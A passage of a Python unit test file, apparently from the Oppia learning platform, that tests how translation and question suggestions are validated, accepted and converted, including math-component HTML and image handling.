'Accepted suggestion by translator: Add translation change.')
exploration = exp_fetchers.get_exploration_by_id('exp1')
self.assertEqual(exploration.get_translation_counts(), {
'hi': 1
})
def test_accept_suggestion_with_psedonymous_author_adds_translation(self):
self.save_new_default_exploration('exp1', self.author_id)
exploration = exp_fetchers.get_exploration_by_id('exp1')
self.assertEqual(exploration.get_translation_counts(), {})
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.PSEUDONYMOUS_ID,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.accept(
'Accepted suggestion by translator: Add translation change.')
exploration = exp_fetchers.get_exploration_by_id('exp1')
self.assertEqual(exploration.get_translation_counts(), {
'hi': 1
})
def test_get_all_html_content_strings(self):
suggestion = suggestion_registry.SuggestionTranslateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, self.suggestion_dict['change'],
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_all_html_content_strings()
expected_outcome_list = [
u'<p>This is translated html.</p>', u'<p>This is a content.</p>']
self.assertEqual(expected_outcome_list, actual_outcome_list)
def test_get_all_html_content_strings_for_content_lists(self):
suggestion = suggestion_registry.SuggestionTranslateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id,
{
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': ['text1', 'text2'],
'translation_html': ['translated text1', 'translated text2'],
'data_format': 'set_of_normalized_string'
},
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_all_html_content_strings()
expected_outcome_list = [
'translated text1', 'translated text2', 'text1', 'text2']
self.assertEqual(expected_outcome_list, actual_outcome_list)
def test_get_target_entity_html_strings_returns_expected_strings(self):
suggestion = suggestion_registry.SuggestionTranslateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, self.suggestion_dict['change'],
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_target_entity_html_strings()
expected_outcome_list = [self.suggestion_dict['change']['content_html']]
self.assertEqual(expected_outcome_list, actual_outcome_list)
def test_convert_html_in_suggestion_change(self):
html_content = (
'<p>Value</p><oppia-noninteractive-math raw_latex-with-value="&a'
'mp;quot;+,-,-,+&quot;"></oppia-noninteractive-math>')
expected_html_content = (
'<p>Value</p><oppia-noninteractive-math math_content-with-value='
'"{&quot;raw_latex&quot;: &quot;+,-,-,+&quot;, &'
'amp;quot;svg_filename&quot;: &quot;&quot;}"></oppia'
'-noninteractive-math>')
change_dict = {
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': html_content,
'translation_html': '<p>This is translated html.</p>',
'data_format': 'html'
}
suggestion = suggestion_registry.SuggestionTranslateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, change_dict,
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
suggestion.convert_html_in_suggestion_change(
html_validation_service.add_math_content_to_math_rte_components)
self.assertEqual(
suggestion.change.content_html, expected_html_content)
class SuggestionAddQuestionTest(test_utils.GenericTestBase):
"""Tests for the SuggestionAddQuestion class."""
AUTHOR_EMAIL = '[email protected]'
REVIEWER_EMAIL = '[email protected]'
ASSIGNED_REVIEWER_EMAIL = '[email protected]'
fake_date = datetime.datetime(2016, 4, 10, 0, 0, 0, 0)
def setUp(self):
super(SuggestionAddQuestionTest, self).setUp()
self.signup(self.AUTHOR_EMAIL, 'author')
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.suggestion_dict = {
'suggestion_id': 'skill1.thread1',
'suggestion_type': feconf.SUGGESTION_TYPE_ADD_QUESTION,
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': 'skill1',
'target_version_at_submission': 1,
'status': suggestion_models.STATUS_ACCEPTED,
'author_name': 'author',
'final_reviewer_id': self.reviewer_id,
'change': {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_1'],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3,
},
'score_category': 'question.topic_1',
'language_code': 'en',
'last_updated': utils.get_time_in_millisecs(self.fake_date),
'edited_by_reviewer': False
}
def test_create_suggestion_add_question(self):
expected_suggestion_dict = self.suggestion_dict
observed_suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertDictEqual(
observed_suggestion.to_dict(), expected_suggestion_dict)
def test_validate_suggestion_edit_state_content(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
def test_get_score_part_helper_methods(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertEqual(suggestion.get_score_type(), 'question')
self.assertEqual(suggestion.get_score_sub_type(), 'topic_1')
def test_validate_score_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'content.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the first part of score_category to be "question"'
):
suggestion.validate()
def test_validate_change_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change = 'invalid_change'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected change to be an instance of QuestionSuggestionChange'
):
suggestion.validate()
def test_validate_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.cmd = None
with self.assertRaisesRegex(
utils.ValidationError, 'Expected change to contain cmd'
):
suggestion.validate()
def test_validate_change_cmd_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.cmd = 'invalid_cmd'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected cmd to be create_new_fully_specified_question'
):
suggestion.validate()
def test_validate_change_question_dict(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.question_dict = None
with self.assertRaisesRegex(
utils.ValidationError, 'Expected change to contain question_dict'
):
suggestion.validate()
def test_validate_change_question_state_data_schema_version(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
# We are not setting value in suggestion.change.question_dict
# directly since pylint produces unsupported-assignment-operation
# error. The detailed analysis for the same can be checked
# in this issue: https://github.com/oppia/oppia/issues/7008.
question_dict = suggestion.change.question_dict
question_dict['question_state_data_schema_version'] = 0
suggestion.change.question_dict = question_dict
with self.assertRaisesRegex(
utils.ValidationError,
'Expected question state schema version to be %s, '
'received 0' % feconf.CURRENT_STATE_SCHEMA_VERSION
):
suggestion.validate()
def test_validate_change_skill_difficulty_none(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.skill_difficulty = None
with self.assertRaisesRegex(
utils.ValidationError, 'Expected change to contain skill_difficulty'
):
suggestion.validate()
def test_validate_change_skill_difficulty_invalid_value(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.skill_difficulty = 0.4
with self.assertRaisesRegex(
utils.ValidationError,
'Expected change skill_difficulty to be one of '
):
suggestion.validate()
def test_pre_accept_validate_change_skill_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
skill_id = skill_services.get_new_skill_id()
self.save_new_skill(skill_id, self.author_id, description='description')
suggestion.change.skill_id = skill_id
suggestion.pre_accept_validate()
suggestion.change.skill_id = None
with self.assertRaisesRegex(
utils.ValidationError, 'Expected change to contain skill_id'
):
suggestion.pre_accept_validate()
def test_pre_accept_validate_change_invalid_skill_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
skill_id = skill_services.get_new_skill_id()
self.save_new_skill(skill_id, self.author_id, description='description')
suggestion.change.skill_id = skill_id
suggestion.pre_accept_validate()
suggestion.change.skill_id = skill_services.get_new_skill_id()
with self.assertRaisesRegex(
utils.ValidationError, 'The skill with the given id doesn\'t exist.'
):
suggestion.pre_accept_validate()
def test_get_change_list_for_accepting_suggestion(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertIsNone(suggestion.get_change_list_for_accepting_suggestion())
def test_populate_old_value_of_change(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertIsNone(suggestion.populate_old_value_of_change())
def test_cannot_accept_suggestion_with_invalid_skill_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.change.skill_id = skill_services.get_new_skill_id()
with self.assertRaisesRegex(
utils.ValidationError,
'The skill with the given id doesn\'t exist.'
):
suggestion.accept('commit message')
def test_pre_update_validate_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': question_domain.CMD_UPDATE_QUESTION_PROPERTY,
'property_name': question_domain.QUESTION_PROPERTY_LANGUAGE_CODE,
'new_value': 'bn',
'old_value': 'en'
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change cmd must be equal to '
'create_new_fully_specified_question'
):
suggestion.pre_update_validate(
question_domain.QuestionChange(change))
def test_pre_update_validate_change_skill_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_2'
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change skill_id must be equal to skill_1'
):
suggestion.pre_update_validate(
question_domain.QuestionChange(change))
def test_pre_update_validate_complains_if_nothing_changed(self):
change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3
}
suggestion = suggestion_registry.SuggestionAddQuestion(
'exploration.exp1.thread1', 'exp1', 1,
suggestion_models.STATUS_ACCEPTED, self.author_id,
self.reviewer_id, change,
'question.topic_1', 'en', self.fake_date)
new_change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3
}
with self.assertRaisesRegex(
utils.ValidationError,
'At least one of the new skill_difficulty or question_dict '
'should be changed.'):
suggestion.pre_update_validate(
question_domain.QuestionSuggestionChange(new_change))
def test_pre_update_validate_accepts_a_change_in_skill_difficulty_only(
self):
change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3
}
suggestion = suggestion_registry.SuggestionAddQuestion(
'exploration.exp1.thread1', 'exp1', 1,
suggestion_models.STATUS_ACCEPTED, self.author_id,
self.reviewer_id, change,
'question.topic_1', 'en', self.fake_date)
new_change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_1',
'skill_difficulty': 0.6
}
self.assertEqual(
suggestion.pre_update_validate(
question_domain.QuestionSuggestionChange(new_change)), None)
def test_pre_update_validate_accepts_a_change_in_state_data_only(self):
change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3
}
suggestion = suggestion_registry.SuggestionAddQuestion(
'exploration.exp1.thread1', 'exp1', 1,
suggestion_models.STATUS_ACCEPTED, self.author_id,
self.reviewer_id, change,
'question.topic_1', 'en', self.fake_date)
new_change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'hi',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3
}
self.assertEqual(
suggestion.pre_update_validate(
question_domain.QuestionSuggestionChange(new_change)), None)
def test_validate_author_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.author_id = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected author_id to be a string'):
suggestion.validate()
def test_validate_author_id_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.author_id = ''
with self.assertRaisesRegex(
utils.ValidationError,
'Expected author_id to be in a valid user ID format.'):
suggestion.validate()
def test_validate_final_reviewer_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.final_reviewer_id = 1
with self.assertRaisesRegex(
utils.ValidationError, 'Expected final_reviewer_id to be a string'):
suggestion.validate()
def test_validate_final_reviewer_id_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.final_reviewer_id = ''
with self.assertRaisesRegex(
utils.ValidationError,
'Expected final_reviewer_id to be in a valid user ID format'):
suggestion.validate()
def test_validate_language_code_fails_when_language_codes_do_not_match(
self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
expected_question_dict = (
expected_suggestion_dict['change']['question_dict']
)
suggestion.validate()
expected_question_dict['language_code'] = 'wrong_language_code'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected question language_code.wrong_language_code. to be same '
'as suggestion language_code.en.'
):
suggestion.validate()
def test_validate_language_code_fails_when_language_code_is_set_to_none(
self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.language_code = None
with self.assertRaisesRegex(
utils.ValidationError,
'Expected language_code to be en, received None'):
suggestion.validate()
def test_get_all_html_conztent_strings(self):
suggestion = suggestion_registry.SuggestionAddQuestion(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, self.suggestion_dict['change'],
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], self.fake_date)
actual_outcome_list = suggestion.get_all_html_content_strings()
expected_outcome_list = [
u'', u'<p>This is a hint.</p>', u'<p>This is a solution.</p>', u'']
self.assertEqual(expected_outcome_list, actual_outcome_list)
def test_convert_html_in_suggestion_change(self):
html_content = (
'<p>Value</p><oppia-noninteractive-math raw_latex-with-value="&a'
'mp;quot;+,-,-,+&quot;"></oppia-noninteractive-math>')
expected_html_content = (
'<p>Value</p><oppia-noninteractive-math math_content-with-value='
'"{&quot;raw_latex&quot;: &quot;+,-,-,+&quot;, &'
'amp;quot;svg_filename&quot;: &quot;&quot;}"></oppia'
'-noninteractive-math>')
answer_group = {
'outcome': {
'dest': None,
'feedback': {
'content_id': 'feedback_1',
'html': ''
},
'labelled_as_correct': True,
'param_changes': [],
'refresher_exploration_id': None,
'missing_prerequisite_skill_id': None
},
'rule_specs': [{
'inputs': {
'x': 0
},
'rule_type': 'Equals'
}],
'training_data': [],
'tagged_skill_misconception_id': None
}
question_state_dict = {
'content': {
'content_id': 'content_1',
'html': html_content
},
'recorded_voiceovers': {
'voiceovers_mapping': {
'content_1': {},
'feedback_1': {},
'feedback_2': {},
'hint_1': {},
'solution': {}
}
},
'written_translations': {
'translations_mapping': {
'content_1': {},
'feedback_1': {},
'feedback_2': {},
'hint_1': {},
'solution': {}
}
},
'interaction': {
'answer_groups': [answer_group],
'confirmed_unclassified_answers': [],
'customization_args': {
'choices': {
'value': [{
'html': 'option 1',
'content_id': 'ca_choices_0'
}]
},
'showChoicesInShuffledOrder': {
'value': True
}
},
'default_outcome': {
'dest': None,
'feedback': {
'content_id': 'feedback_2',
'html': 'Correct Answer'
},
'param_changes': [],
'refresher_exploration_id': None,
'labelled_as_correct': True,
'missing_prerequisite_skill_id': None
},
'hints': [{
'hint_content': {
'content_id': 'hint_1',
'html': 'Hint 1'
}
}],
'solution': {
'answer_is_exclusive': False,
'correct_answer': 0,
'explanation': {
'content_id': 'solution',
'html': '<p>This is a solution.</p>'
}
},
'id': 'MultipleChoiceInput'
},
'param_changes': [],
'solicit_answer_details': False,
'classifier_model_id': None
}
suggestion_dict = {
'suggestion_id': 'skill1.thread1',
'suggestion_type': feconf.SUGGESTION_TYPE_ADD_QUESTION,
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': 'skill1',
'target_version_at_submission': 1,
'status': suggestion_models.STATUS_ACCEPTED,
'author_name': 'author',
'final_reviewer_id': self.reviewer_id,
'change': {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': question_state_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_1'],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3,
},
'score_category': 'question.skill1',
'language_code': 'en',
'last_updated': utils.get_time_in_millisecs(self.fake_date)
}
suggestion = suggestion_registry.SuggestionAddQuestion(
suggestion_dict['suggestion_id'], suggestion_dict['target_id'],
suggestion_dict['target_version_at_submission'],
suggestion_dict['status'], self.author_id, self.reviewer_id,
suggestion_dict['change'], suggestion_dict['score_category'],
suggestion_dict['language_code'], False, self.fake_date)
suggestion.convert_html_in_suggestion_change(
html_validation_service.add_math_content_to_math_rte_components)
self.assertEqual(
suggestion.change.question_dict['question_state_data']['content'][
'html'], expected_html_content)
def test_accept_suggestion_with_images(self):
html_content = (
'<p>Value</p><oppia-noninteractive-math math_content-with-value='
'"{&quot;raw_latex&quot;: &quot;+,-,-,+&quot;, &'
'amp;quot;svg_filename&quot;: &quot;img.svg&quot;}">'
'</oppia-noninteractive-math>')
question_state_dict = self._create_valid_question_data(
'default_state').to_dict()
question_state_dict['content']['html'] = html_content
with utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'),
'rb', encoding=None) as f:
raw_image = f.read()
image_context = feconf.IMAGE_CONTEXT_QUESTION_SUGGESTIONS
fs_services.save_original_and_compressed_versions_of_image(
'img.svg', image_context, 'skill1',
raw_image, 'image', False)
self.save_new_skill('skill1', self.author_id, description='description')
suggestion_dict = {
'suggestion_id': 'skill1.thread1',
'suggestion_type': feconf.SUGGESTION_TYPE_ADD_QUESTION,
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': 'skill1',
'target_version_at_submission': 1,
'status': suggestion_models.STATUS_ACCEPTED,
'author_name': 'author',
'final_reviewer_id': self.reviewer_id,
'change': {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': question_state_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_1'],
'inapplicable_skill_misconception_ids': []
},
'skill_id': 'skill1',
'skill_difficulty': 0.3,
},
'score_category': 'question.skill1',
'language_code': 'en',
'last_updated': utils.get_time_in_millisecs(self.fake_date)
}
suggestion = suggestion_registry.SuggestionAddQuestion(
suggestion_dict['suggestion_id'], suggestion_dict['target_id'],
suggestion_dict['target_version_at_submission'],
suggestion_dict['status'], self.author_id, self.reviewer_id,
suggestion_dict['change'], suggestion_dict['score_category'],
suggestion_dict['language_code'], False, self.fake_date)
suggestion.accept('commit_message')
def test_accept_suggestion_with_image_region_interactions(self):
with utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'img.png'), 'rb',
encoding=None) as f:
original_image_content = f.read()
fs_services.save_original_and_compressed_versions_of_image(
'image.png', 'question_suggestions', 'skill1',
original_image_content, 'image', True)
question_state_dict = {
'content': {
'html': '<p>Text</p>',
'content_id': 'content'
},
'classifier_model_id': None,
'linked_skill_id': None,
'interaction': {
'answer_groups': [
{
'rule_specs': [
{
'rule_type': 'IsInRegion',
'inputs': {'x': 'Region1'}
}
],
'outcome': {
'dest': None,
'feedback': {
'html': '<p>assas</p>',
'content_id': 'feedback_0'
},
'labelled_as_correct': True,
'param_changes': [],
'refresher_exploration_id': None,
